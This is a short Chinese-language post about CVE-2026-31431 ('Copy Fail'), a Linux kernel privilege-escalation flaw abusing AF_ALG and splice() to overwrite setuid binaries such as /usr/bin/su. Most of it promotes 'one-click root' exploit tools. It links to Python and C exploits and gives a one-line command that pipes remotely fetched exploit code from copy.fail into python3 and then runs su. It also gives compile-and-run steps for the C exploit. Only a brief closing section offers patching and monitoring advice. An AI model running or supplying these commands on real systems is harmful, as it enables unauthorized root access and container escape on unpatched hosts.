字数 258,阅读大约需 2 分钟
前言
CVE-2026-31431(代号 Copy Fail) 是 Linux 内核中一个严重的本地权限提升漏洞。其核心原理是:非特权用户可通过 AF_ALG 加密接口与 splice () 零拷贝技术的组合,绕过内存权限检查,向任意只读文件的页缓存(Page Cache)中写入 4 个可控字节,最终篡改 setuid 程序(如 /usr/bin/su)获取 root 权限。
漏洞相关介绍:
https://github.com/0xShe/CVE-2026-31431/blob/main/README-CN.md
一键提权工具
python 版本
https://github.com/theori-io/copy-fail-CVE-2026-31431
eab51484d449f057f783b318882323aa.pngubuntu2204 执行
4640c78cfdd2e5bea3f288d7019b3b6c.png或者一行命令
curl https://copy.fail/exp | python3 && su
C 语言版本
https://github.com/0xShe/CVE-2026-31431
4e18d22e34380c413b57e8a52cdc66f3.pnggcc -static exploit.c -o exploit
chmod +x exploit
./exploit
防护建议
- 1. 立即升级内核:安装各发行版提供的最新安全内核补丁。
- • 限制本地用户登录(如无必要,禁止普通用户 SSH 接入)。
- • 监控异常的
AF_ALG 与 splice() 系统调用组合。
- 3. 容器 / 云安全:此漏洞可逃逸容器获取宿主机 root 权限,云环境需紧急全量修复。